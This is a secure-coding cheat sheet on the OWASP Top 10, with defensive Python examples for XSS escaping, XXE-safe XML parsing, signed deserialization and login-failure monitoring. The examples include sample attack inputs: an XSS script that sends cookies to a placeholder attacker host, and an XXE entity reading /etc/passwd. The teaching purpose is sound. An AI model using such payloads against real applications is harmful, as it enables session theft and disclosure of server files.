One Pager Cheat Sheet
- As developers, we should make a deliberate effort to protect and secure our web applications by following established guidance such as that of the Open Web Application Security Project (OWASP) and its OWASP Top 10, which lists the ten most critical web application security risks and how to avoid them.
- SQL injection is a security flaw in web applications in which untrusted input is spliced into a database query; attackers exploit it to gain direct access to the database and to make the application do something it was not designed to do. The remedy is parameterised (prepared) queries, so that input is passed as data and never as query syntax.
- Sensitive data exposure is addressed by classifying the data the application processes, stores or transmits according to privacy laws, regulatory requirements, or business needs, and applying controls adequate to each class. Broken authentication is mitigated with multi-factor authentication.
- XML External Entities (XXE) attacks can be prevented by using less complex data formats such as JSON instead of XML where possible, avoiding serialization of sensitive data, disabling DTD and external entity processing in the XML parser, and implementing positive ("whitelisting") server-side input validation together with XSD validation of incoming XML.
- Other common risks and their respective remedies: broken access control (enforce access control checks on the server for every request), security misconfiguration (remove, or do not install, unused features and frameworks), Cross-Site Scripting (XSS) (escape untrusted data according to the HTML context it is written into), and insecure deserialization (verify the integrity of serialized objects before deserializing them, and do not accept serialized objects from untrusted sources).
- XSS is an attack in which an attacker injects malicious script into a page that is served to other users; a typical goal is stealing session cookies in order to gain unauthorized access to a user's account.
- Applications are vulnerable when they are built and run with components that have known vulnerabilities: remove unused dependencies and continuously inventory the components in use and their versions.
- Insufficient logging and monitoring lets attacks go unnoticed: establish effective log generation, monitoring and alerting.
- Logging and monitoring are essential to properly securing an application, providing visibility into events and behaviors so that malicious activity can be detected and responded to quickly.
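The XSS bullets above, as an added example that is not code from the original cheat sheet: a comment renderer that writes untrusted text straight into HTML beside one that escapes it, a positive (allow-list) check for link targets, and a session cookie header marked `HttpOnly` so that script cannot read it. The payload and the `attacker.example` host are constructed placeholders.

```python
import html
import re

# Constructed attacker payload: sends document.cookie to an attacker-controlled host
# (attacker.example is a placeholder, not a real host).
XSS_PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def render_comment_vulnerable(comment: str) -> str:
    # Untrusted text dropped straight into the HTML body: the browser runs the script.
    return '<div class="comment">%s</div>' % comment


def render_comment_safe(comment: str) -> str:
    # Escape for the HTML body/attribute context: < > & " ' become entities, so the
    # payload is displayed as text instead of being parsed as markup.
    return '<div class="comment">%s</div>' % html.escape(comment, quote=True)


def is_allowed_url(url: str) -> bool:
    # Escaping cannot neutralise a "javascript:" URL placed in href: it is valid text
    # but still runs as script. Positive validation admits only http(s) links.
    return re.match(r"^https?://", url.strip(), re.IGNORECASE) is not None


def render_link_safe(url: str, text: str) -> str:
    if not is_allowed_url(url):
        raise ValueError("URL scheme not allowed")
    return '<a href="%s">%s</a>' % (html.escape(url.strip(), quote=True), html.escape(text))


def session_cookie_header(session_id: str) -> str:
    # Defence in depth for the cookie-theft goal: HttpOnly keeps the cookie out of reach
    # of script, Secure restricts it to TLS, SameSite limits cross-site sending.
    return "session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % session_id


if __name__ == "__main__":
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_safe(XSS_PAYLOAD))
    print(render_link_safe("https://example.org/", "example"))
    print(session_cookie_header("opaque-session-id"))
```

Escaping is context-specific: the HTML-entity escaping shown here is right for element content and quoted attribute values, but data written into a script block, a URL or a CSS value needs the encoding for that context.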
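The XXE bullet above, as an added example that is not code from the original cheat sheet: a parser wrapper built on Python's standard-library `xml.sax` that refuses any untrusted document carrying a DOCTYPE (external entities can only be declared inside a DTD) and also switches external general entity resolution off. The benign order document and the `file:///etc/passwd` entity payload are constructed for the demonstration; the parser never reaches the entity because the DOCTYPE itself is rejected.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, property_lexical_handler


class DTDForbidden(ValueError):
    """Raised when an untrusted document carries a DOCTYPE."""


class _RejectDTD:
    # SAX lexical handler: aborting at the DOCTYPE refuses XXE (and entity-expansion
    # "billion laughs" payloads) before any entity declaration is processed.
    def startDTD(self, name, public_id, system_id):
        raise DTDForbidden("DOCTYPE not allowed in untrusted XML (root: %s)" % name)

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


class _TextCollector(ContentHandler):
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_untrusted_xml(data: bytes) -> str:
    """Parse XML and return its concatenated text, refusing any document with a DTD."""
    parser = xml.sax.make_parser()
    # Also disable external general entities. Recent Python versions default this
    # feature to off, but stating it keeps the intent explicit and survives upgrades.
    parser.setFeature(feature_external_ges, False)
    parser.setProperty(property_lexical_handler, _RejectDTD())
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return "".join(collector.parts)


def is_rejected(data: bytes) -> bool:
    try:
        parse_untrusted_xml(data)
    except DTDForbidden:
        return True
    return False


# Constructed inputs for the demonstration (not from the original page).
BENIGN_XML = b"<order><item>widget</item></order>"
XXE_XML = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<foo>&xxe;</foo>"
)

if __name__ == "__main__":
    print("benign text:", parse_untrusted_xml(BENIGN_XML))
    print("XXE payload rejected:", is_rejected(XXE_XML))
```

If the application must accept documents with a DTD, the weaker fallback is to keep the DTD but disable external entity resolution and restrict what the resolver may load; refusing the DTD outright is the simpler rule and the one to prefer for untrusted input.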
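The insecure deserialization remedy above ("ensuring integrity of serialized objects"), as an added example that is not code from the original cheat sheet: objects are serialized to JSON, a data-only format, and tagged with an HMAC-SHA256; on the way back the tag is checked with a constant-time comparison before a single byte of the payload is parsed. The key and the sample object are constructed for the demonstration.

```python
import hashlib
import hmac
import json


class TamperedPayload(ValueError):
    """Raised when a serialized object fails its integrity check."""


def serialize_signed(obj, key: bytes) -> bytes:
    # Canonical JSON body plus an HMAC-SHA256 tag over exactly those bytes.
    body = json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + b"." + tag


def deserialize_verified(blob: bytes, key: bytes):
    # Verify first, parse second: nothing in the payload is interpreted until the tag
    # matches, and the comparison is constant-time to avoid leaking the tag byte by byte.
    body, sep, tag = blob.rpartition(b".")
    if not sep:
        raise TamperedPayload("missing signature")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise TamperedPayload("signature mismatch")
    return json.loads(body)


def is_tampered(blob: bytes, key: bytes) -> bool:
    try:
        deserialize_verified(blob, key)
    except TamperedPayload:
        return True
    return False


if __name__ == "__main__":
    # Constructed key; a deployment loads it from a secret store, never from source.
    key = b"demo-key-for-illustration-only"
    token = serialize_signed({"user": "alice", "role": "user"}, key)
    print(token)
    print(deserialize_verified(token, key))
    forged = token.replace(b'"role":"user"', b'"role":"admin"')
    print("forged token rejected:", is_tampered(forged, key))
```

The integrity check makes the receiver accept only objects it signed itself; it does not make a code-executing format safe, so formats such as Python pickle should still not be used for data that crosses a trust boundary.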
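The logging and monitoring bullets above, as an added example that is not code from the original cheat sheet: a small detector run over constructed authentication log lines that flags any source address with a burst of failed logins inside a sliding time window. The log layout (`timestamp ip event user=...`), the addresses and the threshold are all assumptions made for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines (not from the original page). The first address fails
# against several different accounts in seconds, a password-spraying pattern.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z 203.0.113.7 LOGIN_FAIL user=alice
2024-03-01T10:00:02Z 203.0.113.7 LOGIN_FAIL user=alice
2024-03-01T10:00:03Z 203.0.113.7 LOGIN_FAIL user=bob
2024-03-01T10:00:04Z 203.0.113.7 LOGIN_FAIL user=carol
2024-03-01T10:00:05Z 203.0.113.7 LOGIN_FAIL user=dave
2024-03-01T10:00:06Z 203.0.113.7 LOGIN_OK user=dave
2024-03-01T10:05:00Z 198.51.100.4 LOGIN_FAIL user=erin
2024-03-01T10:09:00Z 198.51.100.4 LOGIN_OK user=erin
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) user=(\S+)$")


def parse_line(line: str):
    """Return (timestamp, ip, event, user) or None for lines that do not match the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group(2), m.group(3), m.group(4)


def find_bruteforce(log_text: str, threshold: int = 5, window: timedelta = timedelta(minutes=1)) -> list:
    """IPs with at least `threshold` failed logins within any `window`-long span, sorted."""
    recent = defaultdict(deque)  # ip -> timestamps of recent failures
    flagged = set()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue  # unparseable lines are skipped here; production code should count them
        ts, ip, event, _user = parsed
        if event != "LOGIN_FAIL":
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop failures that fell out of the sliding window
        if len(q) >= threshold:
            flagged.add(ip)
    return sorted(flagged)


if __name__ == "__main__":
    for ip in find_bruteforce(SAMPLE_LOG):
        print("ALERT: possible brute force from", ip)
```

A rule like this only works if the application emits a log line for every failed login with enough context (time, source address, account) to correlate; the alert should go to a channel somebody actually watches, and the logs themselves should be protected from tampering by the attacker they are meant to detect.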